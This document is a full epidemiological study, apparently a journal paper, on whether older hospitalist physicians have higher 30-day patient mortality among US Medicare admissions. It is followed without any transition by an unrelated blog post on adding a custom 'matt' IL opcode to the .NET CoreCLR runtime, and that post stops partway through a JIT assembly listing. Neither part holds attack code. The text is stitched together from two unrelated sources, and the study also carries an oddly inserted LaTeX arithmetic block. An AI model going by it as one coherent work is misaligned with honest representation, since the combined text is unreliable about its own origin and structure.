Participants 20% random sample of Medicare fee-for-service beneficiaries aged ≥65 admitted to hospital with a medical condition in 2011-14 and treated by hospitalist physicians to whom they were assigned based on scheduled work shifts. To assess the generalizability of findings, analyses also included patients treated by general internists including both hospitalists and non-hospitalists.

Main outcome measures 30 day mortality and readmissions and costs of care.

Results 736 537 admissions managed by 18 854 hospitalist physicians (median age 41) were included. Patients’ characteristics were similar across physician ages. After adjustment for characteristics of patients and physicians and hospital fixed effects (effectively comparing physicians within the same hospital), patients’ adjusted 30 day mortality rates were 10.8% for physicians aged <40 (95% confidence interval 10.7% to 10.9%), 11.1% for physicians aged 40-49 (11.0% to 11.3%), 11.3% for physicians aged 50-59 (11.1% to 11.5%), and 12.1% for physicians aged ≥60 (11.6% to 12.5%). Among physicians with a high volume of patients, however, there was no association between physician age and patient mortality. Readmissions did not vary with physician age, while costs of care were slightly higher among older physicians. Similar patterns were observed among general internists and in several sensitivity analyses.

Conclusions Within the same hospital, patients treated by older physicians had higher mortality than patients cared for by younger physicians, except those physicians treating high volumes of patients.

Introduction

The relation between physician age and performance remains largely unknown, particularly with respect to patient outcomes. Clinical skills and knowledge accumulated by more experienced physicians can lead to improved quality of care. Physicians’ skills, however, can also become outdated as scientific knowledge, technology, and clinical guidelines change. Incorporating these changes into clinical practice is time consuming and can at times be overwhelming.123 Interest in how quality of care evolves over a physician’s career has revived in recent years, with debates over how best to structure programs for continuing medical education, including recent controversy in the US regarding maintenance of certification programs.

A systematic review of the relation between physician experience and quality of care found that older physicians might perform worse—older physicians have decreased clinical knowledge, adhere less often to standards of appropriate treatment, and perform worse on process measures of quality with respect to diagnosis, screening, and preventive care.4 Data on patient outcomes, which arguably are most important, have been scarce.4 Existing studies have also been limited in size or disease scope and have not been nationally representative.567 As a result, whether physician age is associated with patient outcomes remains largely unknown.

Using nationally representative data on Medicare beneficiaries admitted to hospital with a medical condition during 2011-14, we sought answers to three questions. First, what is the association between age of the treating physician and patient mortality after admission? Second, does this association vary with the volume of patients a physician treats? Finally, given national efforts to improve the efficiency of healthcare, is physician age associated with readmissions and costs of care?

Methods

Data

We linked multiple data sources: the 20% Medicare Inpatient Carrier and Medicare Beneficiary Summary Files (2011-14); physician data collected by Doximity (an online professional network for physicians); and the American Hospital Association (AHA) annual survey of hospital characteristics (2012). Doximity has assembled data on all US physicians (both those who are registered members of the service as well as those who are not) from multiple sources and data partnerships, including the national plan and provider enumeration system national provider identifier registry, state medical boards, specialty societies such as the American Board of Medical Specialties, and collaborating hospitals and medical schools. The database includes information on physician age, sex, year of completion and name of medical school, residency, and board certification.89101112 Previous studies have validated data for a random sample of physicians in the Doximity database by using manual audits.89 We were able to match about 95% of physicians in the Medicare database to the Doximity database.

Patients

We identified beneficiaries of Medicare fee-for-service aged ≥65 who were admitted to hospital with a medical condition (as defined by the presence of a medical diagnosis related group on admission) from 1 January 2011 to 31 December 2014. We restricted our sample to patients treated in acute care hospitals and excluded elective admissions and those in which a patient left against medical advice. To allow sufficient follow-up, we excluded patients admitted in December 2014 from 30 day mortality analyses and patients discharged in December 2014 from readmission analyses.

Medicare hospital spending and method of assigning physicians to patients

In the US, Medicare spending on patients in hospital mainly consists of two components: parts A and B. Part A spending is a fixed payment to a hospital per patient that is determined by the final diagnosis or diagnoses of the patient (categorized into diagnosis related groups) and broadly reflects hospital costs other than professional services. Within each hospital the part A payment does not vary for patients within the same diagnosis related group (with a few exceptions). Part B uses fee-for-service payment, and spending varies with the intensity of services delivered, including visits, procedures, and interpretation of tests and images. Based on previous studies,101112 we defined the responsible physician for a given admission as the physician who billed the largest share of part B costs during that admission.13 In a sensitivity analysis, we used alternative assignment methods to assess the robustness of our findings to this attribution rule.

We restricted our analyses to admissions for which the highest spending physicians were hospitalists (described below) or general internists. For patients transferred to other acute care hospitals (1.2% of admissions), we attributed the multi-hospital episode of care and associated outcomes to the assigned physician of the initial admissions.1415 On average, 51%, 22%, and 11% of total part B spending was accounted for by the first, second, and third highest spending physicians, respectively.

Our primary analysis focused on patients treated by hospitalists to examine the possibility that older physicians might treat patients with greater or lesser unmeasured severity of illness. Hospitalists are physicians whose clinical focus is caring for patients admitted to hospital.1617 They are typically trained in internal or family medicine. Some complete subspecialty training as well (such as infectious disease or nephrology) but decide to practice general inpatient medicine. The hospitalist specialty began in the 1990s in the US and is the most rapidly growing medical specialty there. Before the introduction of hospitalists, a patient admitted for a general medical condition was cared for by that patient’s primary care physician (equivalent to general practitioner in the UK), who, on any given day, would typically visit his/her inpatients when time permitted in the outpatient schedule. In 2016, it was estimated that more than 50 000 hospitalists were practicing in the US, and about 75% of US hospitals now have hospitalists.18

Hospitalists typically work in scheduled shifts or blocks (such as one week on and one week off) and do not treat patients in the outpatient setting. Therefore, within the same hospital, patients treated by hospitalists are plausibly quasi-randomized to a particular hospitalist based only on the time of the patient’s admission and the hospitalist’s work schedule.101119 We assessed the validity of this assumption by testing the balance of a broad range of patient characteristics across categories of age of hospitalist. We defined hospitalists as general internists who filed at least 90% of their total evaluation and management billings in an inpatient setting, a claims based approach that a previous study validated by calling physicians to confirm that they were indeed hospitalists (sensitivity of 84.2%, specificity of 96.5%, and a positive predictive value of 88.9%).20

Physician age

Physician age was defined as the age on the date of admission of patients. Data on physician age were available for 93.5% of physicians. Physician age was modeled both as a continuous linear variable and as a categorical variable (in categories of <40, 40-49, 50-59, and ≥60) to allow for a potential non-linear relation with patient outcomes. We also used linear spline models.

Patient outcomes

The primary outcome was the 30 day mortality rate in patients (death within 30 days of admission); secondary outcomes were 30 day readmission rates (readmission within 30 days of discharge) and costs of care. Information on dates of death, including deaths out of hospital, was available in the Medicare Beneficiary summary files. Over 99% of dates of death in these files have been verified by death certificate.21 For mortality analyses, we excluded patients whose death dates were not validated. We defined costs of care as total part B spending per admission.

Adjustment variables

We adjusted for patient characteristics, physician characteristics, and hospital fixed effects. Patient characteristics included age in five year increments, sex, race or ethnic group (non-Hispanic white, non-Hispanic black, Hispanic, other), primary diagnosis (diagnosis related group), 27 comorbidities (Elixhauser comorbidity index22), median household income of zip code (in 10ths), an indicator for dual Medicare-Medicaid coverage, day of the week of the admission date (to account for the possibility that severity of illness of patients could be higher on specific days of the week), and year indicators. Physician characteristics (other than age) included sex, indicator variables for medical school from which a physician graduated (all foreign schools were grouped into a single category), and whether they graduated from allopathic (MD) or osteopathic (DO) medical schools (allopathic and osteopathic schools both teach the same basic curriculums necessary to become a qualified physician, but osteopathic schools emphasize prevention and other techniques as well). We included indicator variables for each hospital, which allowed each hospital to have its own intercept in the regression analyses, a statistical method known as hospital fixed effects. Hospital fixed effects account for both measured and unmeasured characteristics of hospitals that do not vary over time, including unmeasured differences in patient populations, thereby effectively comparing patient outcomes among hospitalists of varying age within the same hospital.232425

Statistical analysis

First, we examined the association between physician age and 30 day mortality using a multivariable logistic regression model treating age as both a continuous variable and a categorical variable to allow for a non-linear relation, adjusting for patient and physician characteristics and hospital fixed effects. We also used linear age splines. To evaluate whether splines improve goodness of fit compared with modeling a linear relation between physician age and patient mortality, we performed a Wald test adjusted for clustering (to approximate a likelihood ratio test because standard likelihood based tests are unavailable with clustered data). To account for potential correlations of patient outcomes within the same physicians, we clustered standard errors at the physician level.26 To overcome complete or quasi-complete separation problems (perfect or nearly perfect prediction of the outcome by the model), we combined diagnosis related group codes with no outcome event (30 day mortality or readmission) into clinically similar categories.27 We calculated adjusted 30 day mortality rates using margins of responses (also known as predictive margins); for each admission we calculated predicted probabilities of outcome with physician age group fixed at each level and then averaged over the distribution of covariates in our national sample.28

Second, because physicians with high volumes of patients might better maintain clinical knowledge and skills,29303132 we examined whether the association between physician age and patient mortality was modified by volume. We classified physicians into thirds of patient volume: low (estimated number of total admissions <90 per year), medium (91-200 admissions), and high (>201 admissions). Within each group, we examined the association between physician age and patient mortality, adjusting for patient and physician characteristics and hospital fixed effects. We used a Wald test to formally test the interaction between physician age and patient volume.

Finally, we evaluated the association between physician age and 30 day readmissions and costs of care. We used multivariable logistic regression models for readmission analyses. Because cost data were right skewed, we used a generalized linear model (GLM) with a log link and gamma distribution.33

Secondary analyses

We conducted several secondary analyses. First, to test the generalizability of our findings, we repeated our analyses among general internists overall, including both hospitalists and non-hospitalists. Second, to evaluate whether our findings were sensitive to how we attributed patients to physicians, we tested two alternative attribution rules: attributing patients to physicians with the largest number of evaluation and management claims and attributing patients to physicians who billed the first claim for a given admission (“admitting physician”). Third, because the association between physician age and mortality could be confounded by unobserved care preferences of patients, such as do-not-resuscitate directives, we excluded patients with cancer and those discharged to a hospice. Fourth, to assess the relation between physician age and patient outcomes in a relatively young population whose probability of death is lower, we restricted our analysis to patients aged 65-75. Fifth, an increasing number of young subspecialists in specialties like nephrology and infectious disease work as hospitalists but were excluded from our primary analyses. To investigate this, we reanalyzed the data including hospitalists with medical subspecialties and adjusted for their specialty. Sixth, patients who are admitted multiple times might not be randomly assigned to a given hospitalist but instead to the hospitalist who treated the patient previously. To deal with this, we reanalyzed the data after restricting our sample to the first admission. Seventh, we also evaluated in hospital, 60 day, and 90 day mortality rates to assess if any survival gains were short lived. Eighth, we used generalized estimating equations (GEE) with an independent covariance matrix to account for the hierarchical structure of the data because of the grouping of patients within hospitals, adjusting for patient and physician characteristics and hospital fixed effects.34 Ninth, to focus on more homogenous patient populations, we separately analyzed the four most common conditions treated by hospitalists in our data (sepsis, pneumonia, congestive heart failure, and chronic obstructive pulmonary disease) (see table A in the appendix for diagnosis codes). Tenth, we used years since completion of residency, instead of physician age, as a measure of physician experience. We did not use this variable for our primary analyses because data on year of residency completion were missing for 35.5% of physicians, and we were concerned that missingness might not be at random. Eleventh, we conducted a formal sensitivity analysis to assess the extent to which an unmeasured confounder might explain our results.35 Twelfth, we conducted cost analysis using different model specifications: a GLM model with a log link and a negative binomial distribution, a GLM model with a log link and a Poisson distribution, and an ordinary least squares model after winsorizing the top 1% of observations with largest residuals (replacing outlier costs by the most extreme retained values). Finally, we conducted analyses among subgroups including Medicare beneficiaries aged ≥65 who were admitted to hospital with an emergency medical condition (as opposed to our baseline analysis of “non-elective” conditions, which included both emergency and urgent admissions), Medicare beneficiaries aged ≥65 who were admitted with an elective medical condition, and Medicare beneficiaries aged 20-64. 
The latter group qualified for Medicare through disability and has generally worse health status than the general US population aged below 65, but nonetheless the generalizability of our findings to populations of younger patients is of interest.

Data preparation was conducted with SAS, version 9.4 (SAS Institute), and analyses were performed with Stata, version 14 (StataCorp, College Station, TX).

Patient involvement

No patients were involved in setting the research question or the outcome measures, nor were they involved in developing plans for the design or implementation of the study. No patients were asked to advise on interpretation or writing up of results. There are no plans to disseminate the results of the research to study participants or the relevant patient community. Patient consent was not required for the study.

Results

Physician and patient characteristics

The median and mean age among 18 854 hospitalist physicians in our sample in 2014 were 41.0 and 42.9, respectively. A broad range of patient characteristics, including the number of Elixhauser comorbidities and composite Elixhauser comorbidity scores,36 were balanced across physicians with different ages (table 1).

Table 1

Study population of Medicare beneficiaries treated in hospital in 2011-14 by age of treating physician. Figures are percentage unless otherwise specified

Physician age and patient mortality

The overall 30 day mortality rate in our final sample of 736 537 hospital admissions was 11.1%. Figure 1 shows the results of a logistic regression model with linear splines. After adjustment for patient and physician characteristics and hospital fixed effects, older physicians had significantly higher patient mortality than younger physicians. We could reject the null hypothesis of linearity (P=0.02, fig 1). Because we observed a non-linear relation between physician age and patient mortality, we also fitted a linear spline logistic model allowing for different slopes for physicians aged <60 and aged ≥60 and found that an additional 10 year increase in physician age was associated with an adjusted odds ratio of 30 day mortality of 1.03 (95% confidence interval 1.02 to 1.05; P<0.001) for physicians aged <60, and 1.22 (1.08 to 1.37; P=0.01) for physicians aged ≥60 (table 2). When age was modeled as a continuous linear variable, an additional 10 year increase in physician age was associated with an adjusted odds ratio of 30 day mortality of 1.04 (1.03 to 1.06; P<0.001), interpreted as the average odds ratio across all physician age groups (table 2).

Fig 1 Adjusted association between physician age and patient mortality with linear spline model. Multivariable logistic regression model with linear splines was used with knots placed at physician age of 40, 50, and 60, adjusted for patient and physician characteristics and hospital fixed effects. Solid line represents point estimates, and shaded area represents 95% CI around these estimates

Table 2

Association between physician age and 30 day patient mortality in patients admitted to hospital. Table includes results of three analyses: modeling age as a continuous variable, modeling age as a continuous variable with separate splines at ages <60 and ≥60, and modeling age as categorical variable. All models adjusted for patient and physician characteristics and hospital fixed effects. Standard errors were clustered at physician level. Estimates should be interpreted as average odds ratio across all physician age categories

Treating physician age as a categorical variable showed a monotonic relation between physician age and patient mortality. Physicians aged <40 had the lowest patient mortality rate (adjusted 30 day mortality rate 10.8%, 95% confidence interval 10.7% to 10.9%), followed by physicians aged 40-49 (11.1%, 11.0% to 11.3%), 50-59 (11.3%, 11.1% to 11.5%), and ≥60 (12.1%, 11.6% to 12.5%) (table 2).

Physician age and patient mortality by volume

Physician age was positively associated with patient mortality among physicians with low and medium volumes of patients but not among those with high volumes of patients (table 3), who also had the lowest overall mortality rate. For instance, each 10 year increase in physician age was associated with adjusted odds ratios of 30 day mortality of 1.19 (95% confidence interval 1.14 to 1.23; P<0.001) and 1.06 (1.03 to 1.09; P<0.001) among low and medium volume physicians, respectively. In contrast, despite the larger sample size among high volume physicians, we observed no association between physician age and patient mortality (adjusted odds ratio for additional 10 years, 1.01, 0.99 to 1.03; P=0.29). The interaction between physician age and patient volume was significant (P<0.001).

Table 3

Physician age and 30 day patient mortality in patients admitted to hospital, stratified by patient volume

Patient readmissions and part B spending

We found no association between physician age and the patient 30 day readmission rate (adjusted odds ratio for additional 10 years, 1.00, 95% confidence interval 0.99 to 1.01; P=0.82) (table 4). Although differences in part B spending between physicians of varying age were significant, they were small. Each 10 year increase in physician age was associated with a 2.4% increase (2.0% to 2.8%; P<0.001) in part B spending.

Table 4

Association between physician age, 30 day readmission rate, and costs of care in patients admitted to hospital

Secondary analyses

Our overall findings were qualitatively unaffected by including non-hospitalist general internists, although the observed relation between patient mortality and physician age was smaller (table B in appendix). The smaller relation between physician age and patient outcomes might be because of unobserved differences in severity of illness between patients treated by young versus old physicians or actual differences in how physician age relates to patient mortality among hospitalists versus non-hospitalist general internists. Our findings were also not sensitive to using alternative methods for attributing physicians (table C in appendix); excluding patients with cancer or discharged to hospice (table D in appendix); restricting analysis to patients aged 65-75 (table E in appendix); including hospitalists with medical subspecialty boards (table F in appendix); restricting to the first admission for patients with multiple admissions (table G in appendix); using in hospital, 60 day, and 90 day mortality rates instead of 30 day mortality (tables H and I in appendix); and the use of GEE instead of cluster robust standard errors (table J in appendix). When we stratified by primary diagnosis, older hospitalists had higher patient mortality for sepsis, congestive heart failure, and chronic obstructive pulmonary disease, but not for pneumonia (table K in appendix). When using years in practice instead of age we found similar results (table L in appendix). A formal test for an unmeasured confounder showed that it is unlikely that this could explain the observed association between physician age and patient mortality (table M in appendix). Use of different model specifications for cost analyses did not qualitatively affect our findings (table N in appendix). Finally, we observed similar relations between physician age and 30 day patient mortality in subgroup analyses of Medicare beneficiaries aged ≥65 who were admitted with an emergency medical condition, Medicare beneficiaries aged ≥65 who were admitted with an elective medical condition, and admitted Medicare beneficiaries aged 20-64 (tables O and P in appendix).

Discussion

Principal findings

In a national sample of elderly Medicare beneficiaries admitted to hospital with medical conditions, we found that patients treated by older physicians had higher 30 day mortality than those cared for by younger physicians, despite similar patient characteristics. These associations were found among physicians with low and medium volumes of patients but not among those with high volumes. Readmission rates and costs of care did not meaningfully vary with physician age. Taken together, our findings suggest that differences in practice patterns or process measures of quality between physicians with varying years of experience reported in previous studies123437 might have a meaningful impact on patient outcomes.

Mechanisms that could explain our current findings can be broadly categorized into effects of age (“age effects”) versus effects arising from differences in how younger and older physicians trained (“cohort effects”). It is possible that physicians further from training are less likely to adhere to evidence based guidelines, might use newly proved treatments less often, and might more often rely on clinical evidence that is not up to date.38 Moreover, while intense exposure to a large number of patients during residency training might enable physicians shortly out of such training to provide high quality care, the benefits of this training experience could wane if physicians care for fewer inpatients after residency. The lack of association between physician age and patient mortality among physicians with higher volume of patients supports this age related hypothesis.

Our findings might just as likely reflect cohort effects rather than declining clinical performance associated with greater age, which has important implications for interpretation of our findings. Hospital medicine is among the most rapidly evolving specialties within medicine, with dramatic changes in the training of recent cohorts of physicians who now work as hospitalists, including greater emphasis on multi-professional team based practice, adherence to clinical guidelines, training on patient handoffs, familiarity with shift work during residency training, and an improved hospital safety culture. Because the specialty of hospital medicine was first recognized in the 1990s, our study might have compared younger physicians who began their careers as hospitalists with older physicians who began their careers as primary care physicians and later became hospitalists. Thus, cohort differences in physician training, as well as declines in skill with aging, could explain our findings. Under this hypothesis, the cohort of physicians entering hospital medicine today might experience no reduction in patient outcomes with aging or possibly improved outcomes. Nonetheless, from the perspective of policymakers and administrators, current outcomes of older versus younger hospitalists might still be important to know irrespective of the path by which younger versus older physicians entered the specialty.

Our findings suggest that within the same hospital, patients treated by physicians aged <40 have 0.85 times the odds of dying (1.00/1.17) or an 11% lower probability of dying (10.8/12.1), compared with patients cared for by physicians aged ≥60 (table 2). This difference in mortality is comparable with the impact of statins for the primary prevention of cardiovascular mortality on all cause mortality (odds ratio of 0.86)39 or the impact of β blockers on mortality among patients with myocardial infarction (incidence rate ratio of 0.86),40 indicating that our observed difference in mortality is not only statistically significant but arguably clinically significant. In addition, if our results are causal, an adjusted risk difference of 1.3 percentage points suggests that for every 77 patients treated by doctors aged ≥60, one fewer patient would die within 30 days of admission if those patients were cared for by physicians aged <40.
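
For readers who want to trace those figures, the arithmetic (using only the adjusted estimates quoted above) is:

\[
\frac{1.00}{1.17} \approx 0.85 \quad\text{(relative odds)}, \qquad
\frac{10.8\%}{12.1\%} \approx 0.89 \quad\text{(about 11\% lower probability)},
\]
\[
12.1\% - 10.8\% = 1.3 \text{ percentage points}, \qquad
\frac{1}{0.013} \approx 77 \text{ patients per one additional death}.
\]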

Policy implications

Our findings should be regarded as exploratory. Nonetheless, they highlight the importance of patient outcomes as one component of an assessment of how physician practices change over a career. The purpose of continuing medical education is to ensure that physicians provide high quality care over the course of their careers. Although continuing medical education can take multiple forms that vary across specialties and across countries, the issue of ensuring that physicians keep up with current standards of care is applicable across all specialties and countries. In the US, for example, there are ongoing debates about the requirements for maintenance of certification, with many physicians arguing that current requirements could be burdensome and unneeded. Although our study did not analyze the effects of current such policies in the US, it suggests that continuing medical education of physicians could be important and that continual assessment of outcomes might be useful. In addition, although quality of care initiatives have largely focused on system level measures (such as hospital 30 day mortality and readmissions), there is increasing policy emphasis on the role of individual physicians in influencing costs and quality of care.414243 For example, in the US, the Centers for Medicare and Medicaid Services has just promulgated draft final regulations for a new approach to pay individual clinicians for the value and quality of care they provide under the Medicare Access and CHIP Reauthorization Act (MACRA).44

Strengths and limitations of study

Our study has several limitations. First, our findings would be confounded if older physicians, on average, treat patients at higher risk of 30 day mortality because of factors unmeasured by our analysis. We specifically chose our within hospital study design to deal with this concern, hypothesizing that patients are essentially randomized to hospitalist physicians of various ages within the same hospital, an assumption supported by the largely similar demographic and clinical characteristics across patients that older and younger physicians treat. Second, we found that the positive association between physician age and patient mortality was driven primarily by physicians treating low to medium volumes of patients, suggesting that high volumes could be “protective” of clinical skills. The association between practice volume and skills, however, could be bidirectional—physicians whose skills are declining might either self select, or be encouraged by others to leave, positions in which they are responsible for clinical management of large numbers of patients and could, therefore, treat fewer patients over time. Nonetheless, it is still important to know that older physicians with low and medium volumes of patients have worse patient outcomes because this information could suggest that specific interventions could be targeted towards these physicians. Third, the cross sectional nature of our study did not allow us to distinguish the degree to which our findings were attributable to declines in clinical performance with physician age versus cohort effects associated with secular changes in training. In the latter case, although older physicians could now be associated with higher patient mortality, as the current cohort of younger hospitalists age they might retain their superior patient outcomes even without individual maintenance of certification-type interventions. Fourth, physician age is only one of several factors associated with physician performance; physicians of varying skill level can be found within every age category. Finally, our findings might not generalize to the non-Medicare population, to patients cared for by surgeons or other specialists, or to physicians practicing in other countries (particularly as rates of hospitalist use might differ across countries). Further studies are warranted to understand whether similar patterns are observed in these other settings.

Conclusions

Patients in hospital treated by older hospitalists have higher mortality than patients cared for by younger hospitalists, except for hospitalist physicians with high volumes of patients. We found similar associations among patients treated by general internists. Readmission rates and costs of care did not meaningfully vary with physician age.

What is already known on this topic

  • Whether quality of care differs between younger and older physicians remains largely unknown

  • Though clinical skills and knowledge accumulated by more experienced physicians could lead to improved quality of care, physicians’ skills might become outdated as scientific knowledge, technology, and clinical guidelines change

  • Older physicians might have decreased clinical knowledge, adhere less often to standards of appropriate treatment, and perform worse on process measures of quality with respect to diagnosis, screening, and preventive care

What this study adds

  • This study examined patient outcomes, including 30 day mortality, readmissions, and costs of care, in a nationally representative sample of US Medicare beneficiaries admitted to hospital with a medical condition in 2011-14

  • Patients were treated by hospitalists (physicians whose clinical focus is caring for patients in hospital), to whom they are typically assigned based on scheduled work shifts

  • Within the same hospital, patients treated by older hospitalists had similar characteristics to patients treated by younger hospitalists but had higher mortality rates, with the exception of those hospitalists who treated high volumes of patients

  • Readmissions did not vary with physician age, while costs of care were slightly higher among older physicians

Adding a new Bytecode instruction to the .NET runtime


Now that the CoreCLR is open-source we can do fun things, for instance find out if it’s possible to add a new IL (Intermediate Language) instruction to the runtime.

TL;DR it turns out that it’s easier than you might think!! Here are the steps you need to go through:


Step 0

But first a bit of background information. Adding a new IL instruction to the CLR is a pretty rare event; the last time it was done for real was in .NET 2.0, when support for generics was added. This is part of the reason why .NET code has good backwards-compatibility, from Backward compatibility and the .NET Framework 4.5:

The .NET Framework 4.5 and its point releases (4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7) are backward-compatible with apps that were built with earlier versions of the .NET Framework. In other words, apps and components built with previous versions will work without modification on the .NET Framework 4.5.

Side note: The .NET framework did break backwards compatibility when moving from 1.0 to 2.0, precisely so that support for generics could be added deep into the runtime, i.e. with support in the IL. Java took a different decision, I guess because it had been around longer and breaking backwards-compatibility was a bigger issue. See the excellent blog post Comparing Java and C# Generics for more info.


Step 1

For this exercise I plan to add a new IL instruction (op-code) to the CoreCLR runtime and because I’m a raving narcissist (not really, see below) I’m going to name it after myself. So let me introduce the matt IL instruction, that you can use like so:

.method private hidebysig static int32 TestMattOpCodeMethod(int32 x, int32 y) 
        cil managed noinlining
{
    .maxstack 2
    ldarg.0
    ldarg.1
    matt  // yay, my name as an IL op-code!!!!
    ret
}

But because I’m actually a bit British (i.e. I don’t like to ‘blow my own trumpet’), I’m going to make the matt op-code almost completely pointless: it’s going to do exactly the same thing as calling Math.Max(x, y), i.e. just return the larger of the 2 numbers.

The other reason for naming it matt is that I’d really like someone to make a version of the C# (Roslyn) compiler that allows you to write code like this:

Console.WriteLine("{0} m@ {1} = {2}",1,7,1m@7));// prints '1 m@ 7 = 7'

I definitely want the m@ operator to be a thing (pronounced ‘matt’, not ‘m-at’), maybe the other ‘Matt Warren’ who works at Microsoft on the C# Language Design Team can help out!! Seriously though, if anyone reading this would like to write a similar blog post, showing how you’d add the m@ operator to the Roslyn compiler, please let me know I’d love to read it.

Now we’ve defined the op-code, the first step is to ensure that the run-time and tooling can recognise it. In particular we need the IL Assembler (a.k.a ilasm) to be able to take the IL code above (TestMattOpCodeMethod(..)) and produce a .NET executable.

As the .NET runtime source code is nicely structured (+1 to the runtime devs), to make this possible we only need to make changes in opcode.def:

--- a/src/inc/opcode.def
+++ b/src/inc/opcode.def
@@ -154,7 +154,7 @@ OPDEF(CEE_NEWOBJ,                     "newobj",           VarPop,             Pu
 OPDEF(CEE_CASTCLASS,                  "castclass",        PopRef,             PushRef,     InlineType,         IObjModel,   1,  0xFF,    0x74,    NEXT)
 OPDEF(CEE_ISINST,                     "isinst",           PopRef,             PushI,       InlineType,         IObjModel,   1,  0xFF,    0x75,    NEXT)
 OPDEF(CEE_CONV_R_UN,                  "conv.r.un",        Pop1,               PushR8,      InlineNone,         IPrimitive,  1,  0xFF,    0x76,    NEXT)
-OPDEF(CEE_UNUSED58,                   "unused",           Pop0,               Push0,       InlineNone,         IPrimitive,  1,  0xFF,    0x77,    NEXT)
+OPDEF(CEE_MATT,                       "matt",             Pop1+Pop1,          Push1,       InlineNone,         IPrimitive,  1,  0xFF,    0x77,    NEXT)
 OPDEF(CEE_UNUSED1,                    "unused",           Pop0,               Push0,       InlineNone,         IPrimitive,  1,  0xFF,    0x78,    NEXT)
 OPDEF(CEE_UNBOX,                      "unbox",            PopRef,             PushI,       InlineType,         IPrimitive,  1,  0xFF,    0x79,    NEXT)
 OPDEF(CEE_THROW,                      "throw",            PopRef,             Push0,       InlineNone,         IObjModel,   1,  0xFF,    0x7A,    THROW)

I just picked the first available unused slot and added matt in there. It’s defined as Pop1+Pop1 because it takes 2 values from the stack as input and Push1 because after it has executed, a single result is pushed back onto the stack.

Note: all the changes I made are available in one-place on GitHub if you’d rather look at them like that.

Once this change was made, ilasm will successfully assemble the test code file HelloWorld.il that contains TestMattOpCodeMethod(..), as shown above:

λ ilasm /EXE /OUTPUT=HelloWorld.exe -NOLOGO HelloWorld.il

Assembling 'HelloWorld.il'  to EXE --> 'HelloWorld.exe'
Source file is ANSI

Assembled method HelloWorld::Main
Assembled method HelloWorld::TestMattOpCodeMethod

Creating PE file

Emitting classes:
Class 1:        HelloWorld

Emitting fields and methods:
Global
Class 1 Methods: 2;
Resolving local member refs: 1 -> 1 defs, 0 refs, 0 unresolved

Emitting events and properties:
Global
Class 1
Resolving local member refs: 0 -> 0 defs, 0 refs, 0 unresolved
Writing PE file
Operation completed successfully

Step 2

However at this point the matt op-code isn’t actually executed; at runtime the CoreCLR just throws an exception because it doesn’t know what to do with it. As a first (simpler) step, I just wanted to make the .NET Interpreter work, so I made the following changes to wire it up:

--- a/src/vm/interpreter.cpp
+++ b/src/vm/interpreter.cpp
@@ -2726,6 +2726,9 @@ void Interpreter::ExecuteMethod(ARG_SLOT* retVal, __out bool* pDoJmpCall, __out
         case CEE_REM_UN:
             BinaryIntOp<BIO_RemUn>();
             break;
+        case CEE_MATT:
+            BinaryArithOp<BA_Matt>();
+            break;
         case CEE_AND:
             BinaryIntOp<BIO_And>();
             break;

--- a/src/vm/interpreter.hpp
+++ b/src/vm/interpreter.hpp
@@ -298,10 +298,14 @@ void Interpreter::BinaryArithOpWork(T val1, T val2)
         {
             res = val1 / val2;
         }
-        else
+        else if (op == BA_Rem)
         {
             res = RemFunc(val1, val2);
         }
+        else if (op == BA_Matt)
+        {
+            res = MattFunc(val1, val2);
+        }
     }

and then I added the methods that would actually implement the interpreted code:

--- a/src/vm/interpreter.cpp
+++ b/src/vm/interpreter.cpp
@@ -10801,6 +10804,26 @@ double Interpreter::RemFunc(double v1, double v2)
     return fmod(v1, v2);
 }
+INT32 Interpreter::MattFunc(INT32 v1, INT32 v2)
+{
+    return v1 > v2 ? v1 : v2;
+}
+
+INT64 Interpreter::MattFunc(INT64 v1, INT64 v2)
+{
+    return v1 > v2 ? v1 : v2;
+}
+
+float Interpreter::MattFunc(float v1, float v2)
+{
+    return v1 > v2 ? v1 : v2;
+}
+
+double Interpreter::MattFunc(double v1, double v2)
+{
+    return v1 > v2 ? v1 : v2;
+}

So it’s fairly straightforward, and the bonus is that at this point the matt operator is fully operational: you can actually write IL using it and it will run (interpreted only).


Step 3

However not everyone wants to re-compile the CoreCLR just to enable the Interpreter, so I want to also make it work for real via the Just-in-Time (JIT) compiler.

The full changes to make this work were spread across multiple files, but were mostly housekeeping so I won’t include them all here, check-out the full diff if you’re interested. But the significant parts are below:

--- a/src/jit/importer.cpp
+++ b/src/jit/importer.cpp
@@ -11112,6 +11112,10 @@ void Compiler::impImportBlockCode(BasicBlock* block)
                 oper = GT_UMOD;
                 goto MATH_MAYBE_CALL_NO_OVF;
+            case CEE_MATT:
+                oper = GT_MATT;
+                goto MATH_MAYBE_CALL_NO_OVF;
+
             MATH_MAYBE_CALL_NO_OVF:
                 ovfl = false;
             MATH_MAYBE_CALL_OVF:

--- a/src/vm/jithelpers.cpp
+++ b/src/vm/jithelpers.cpp
@@ -341,6 +341,14 @@ HCIMPL2(UINT32, JIT_UMod, UINT32 dividend, UINT32 divisor)
 HCIMPLEND

 /*********************************************************************/
+HCIMPL2(INT32, JIT_Matt, INT32 x, INT32 y)
+{
+    FCALL_CONTRACT;
+    return x > y ? x : y;
+}
+HCIMPLEND
+
+/*********************************************************************/
 HCIMPL2_VV(INT64, JIT_LDiv, INT64 dividend, INT64 divisor)
 {
     FCALL_CONTRACT;

In summary, these changes mean that during the JIT’s ‘Morph phase’ the IL containing the matt op code is converted from:

fgMorphTree BB01, stmt 1 (before)
       [000004] ------------             ▌  return    int   
       [000002] ------------             │  ┌──▌  lclVar    int    V01 arg1        
       [000003] ------------             └──▌  m@        int   
       [000001] ------------                └──▌  lclVar    int    V00 arg0               

into this:

fgMorphTree BB01, stmt 1 (after)
       [000004] --C--+------             ▌  return    int   
       [000003] --C--+------             └──▌  call help int    HELPER.CORINFO_HELP_MATT
       [000001] -----+------ arg0 in rcx    ├──▌  lclVar    int    V00 arg0         
       [000002] -----+------ arg1 in rdx    └──▌  lclVar    int    V01 arg1     

Note the call to HELPER.CORINFO_HELP_MATT

When this is finally compiled into assembly code it ends up looking like so:

// Assembly listing for method HelloWorld:TestMattOpCodeMethod(int,int):int
// Emitting BLENDED_CODE for X64 CPU with AVX
// optimized code
// rsp based frame
// partially interruptible
// Final local variable assignments
//
//  V00 arg0         [V00,T00] (  3,  3   )     int  ->  rcx
//  V01 arg1         [V01,T01] (  3,  3   )     int  ->  rdx
//  V02 OutArgs      [V02    ] (  1,  1   )  lclBlk (32) [rsp+0x00]
//
// Lcl frame size = 40

G_M9261_IG01:
       4883EC28             sub      rsp, 40
G_M9261_IG02:
       E8976FEB5E           call     CORINFO_HELP_MATT
       90                   nop
G_M9261_IG03:
       4883C428             add      rsp, 40
